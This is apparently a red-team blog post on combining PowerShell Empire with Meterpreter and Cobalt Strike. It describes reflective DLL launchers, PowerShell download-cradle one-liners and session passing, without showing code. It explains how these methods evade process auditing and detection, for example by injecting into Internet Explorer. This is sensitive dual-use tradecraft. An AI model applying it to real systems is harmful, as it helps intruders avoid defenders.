Empire & Tool Diversity: Integration is Key

Launching Empire From Meterpreter/Beacon

The first situation we’ll dive into is the execution of an Empire agent from an existing access or during initial ‘exploitation’. We use a variety of tools during our engagements, so this is a use case we frequently run into. Tool diversity can be a major strength for any team.

ReflectiveDLL Method

My favorite method of passing access is the use of Empire’s reflective DLL. There will be an entire post on this aspect of the agent, so for the sake of this post, let’s just state that Empire has the ability to generate a Fewer-style reflective DLL launcher that does not require powershell.exe execution. It utilizes Lee Christensen’s (@tifkin_) project UnmangedPowerShell to accomplish this behavior. Sidenote: if you ever want to make your own reflective DLL, Raphael Mudge has a good post outlining the process.

  • Less impact in process auditing scenarios
  • Use of existing user tokens and proxy settings (i.e. inject into Internet Explorer for cleaner egress)
  • Harder to recognize during initial detection methods when compared with “powershell -nop -enc” pattern

Launcher Method

If for some reason you are not able to perform a reflective DLL injection (AV, HIDS, exploit scenario, IR Team etc.) and you still desire Empire, there is a much easier solution. As you likely know, Empire’s stager is a very small stub of PowerShell code that is a souped-up version of the infamous “download cradle”. With this stub of code, we can create a powershell.exe one-liner to execute on any host.

Passing to Metasploit/Cobalt Strike

The inverse of the situations above is also vital to consider. The movement from an existing Empire agent to Beacon or Meterpreter is a common workflow we use in post exploitation scenarios.

Conclusion

This is a small sample of the functionality built into Empire. If you are interested in using it or have questions, check out the documentation at http://www.PowerShellEmpire.com or hit us up in IRC in #psempire.

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store